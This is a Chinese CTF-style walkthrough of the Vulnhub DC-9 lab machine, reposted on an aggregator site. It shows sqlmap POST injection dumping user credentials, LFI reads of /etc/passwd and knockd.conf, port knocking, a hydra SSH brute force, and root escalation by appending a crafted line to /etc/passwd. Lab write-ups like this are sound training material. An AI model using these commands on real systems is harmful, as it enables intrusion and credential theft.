IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> Vulnhub靶场实战---DC-9 -> 正文阅读

[PHP知识库]Vulnhub靶场实战---DC-9

?

0x00 环境准备

1.官网下载地址:

https://www.vulnhub.com/entry/dc-9,412/

2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段

攻击机:kali (192.168.88.130)

靶机:DC-8 (192.168.88.132)
在这里插入图片描述

0x01 信息收集

老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132
在这里插入图片描述
查看开放端口,22端口被过滤,登录80端口查看

nmap -sV -p- -A 192.168.88.132

在这里插入图片描述

0x02 渗透测试

一、SQL注入

登录页面,发现有两个地方可以操控,可能是sql注入,对http://192.168.88.132/manage.php操作,发现无果,接着尝试另一个search页面

http://192.168.88.132/manage.php
http://192.168.88.132/search.php

在这里插入图片描述
输入1’ 报错,说明存在sql注入,但查看url,发现为post注入
![在这里插入图片描述](https://img-blog.csdnimg.cn/612b34d3a6e24fa493e6a23c18aba168.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1
在搜索框输入123后使用sqlmap自动跑,爆数据库名

  sqlmap -u http://192.168.88.132/results.php --data="search=123" -dbs 

在这里插入图片描述
根据第六感首先查看users数据库,发现并没有什么利用价值
在这里插入图片描述
紧接着我们查看staff数据库,爆表名

sqlmap -u http://192.168.88.132/results.php --data="search=123" -D Staff -tables -batch 

在这里插入图片描述
爆字段名

sqlmap -u http://192.168.88.132/results.php --data="search=123" -D Staff -T Users -columns -batch 

在这里插入图片描述
爆用户名密码,这里一路回车,使用sqlmap自带的字典跑出明文密码,但是这里出了点意外,需要多试几次。实在跑不出来用md5在线解密网站,这里推荐一个网站。

https://hashes.com/en/decrypt/hash
sqlmap -u http://192.168.88.132/results.php --data="search=123" -D Staff -T Users -C Username,Password -dump 

在这里插入图片描述

二、文件包含

登录账号admin/transorbital1,发现一个疑似文件包含(LFI)的漏洞
在这里插入图片描述
我们验证一下是否为LFI漏洞,成功包含

http://192.168.88.132/manage.php?file=../../../../etc/passwd

在这里插入图片描述

三、端口敲门服务

想到之前的22端口被过滤掉,可能是因为安装了端口敲门服务,端口敲门服务默认的配置文件路径为:/etc/knockd.conf

端口敲门服务通俗的理解为类似于一种特工的暗号,例如有规律的敲击三下房门,房间内的人才会把门打开。具体解释见下方链接:
https://zhuanlan.zhihu.com/p/59488488
https://www.cnblogs.com/xiaoxiaoleo/p/8523322.html

http://192.168.88.132/manage.php?file=../../../../etc/knockd.conf

在这里插入图片描述
使用nmap依次访问7469、8475、9842三个端口

nmap -p 7469 192.168.88.132
nmap -p 8475 192.168.88.132
nmap -p 9842 192.168.88.132

在这里插入图片描述
或者使用knockd工具
knockd安装

https://www.cnblogs.com/yanzi2020/p/14778112.html
knock 192.168.88.132 7469 8475 9842

查看22端口,发现已被打开
在这里插入图片描述

四、爆破ssh账号密码

将users数据库UserDetails表中的字段信息分别存储在username.txt和passwd.txt两个文件中。
在这里插入图片描述

hydra -L username.txt -P passwd.txt ssh://192.168.88.132

在这里插入图片描述
登录janitor/Ilovepeepee账户,发现一个隐藏文件

ssh janitor@192.168.88.132

在这里插入图片描述
将隐藏文件的密码放入passwd中,再次解密发现一个新账号fredf/B4-Tru3-001
在这里插入图片描述
在这里插入图片描述

0x03 提权

查看fredf用户可以哪些具有root权限的命令
在这里插入图片描述
发现一个test.py的文件
在这里插入图片描述

py文件的含义为:读取参数1的内容,然后将参数1的内容写入到参数2的内容中。
那我们可以构造一个root权限用户,将该用户信息写入文件内,将改文件作为参数1,/etc/passwd作为参数2,这样就创建了一个root权限用户,就能实现提权了

openssl passwd -1 -salt yiqiyihui 123456
-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密

在kali中使用openssl创建一个加密本地用户
在这里插入图片描述
在/tmp下创建flag的文件,使用sudo用test文件运行这个文件

 echo 'yiqiyihui:$1$yiqiyihu$6pPhTsjJB3HQUd80pSDEe1:0:0::/root:/bin/bash' >>/tmp/flag

在这里插入图片描述
切换到yiqiyihui用户,获取flag
在这里插入图片描述

?

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-12-26 21:55:54  更:2021-12-26 21:56:51 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:28:06-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码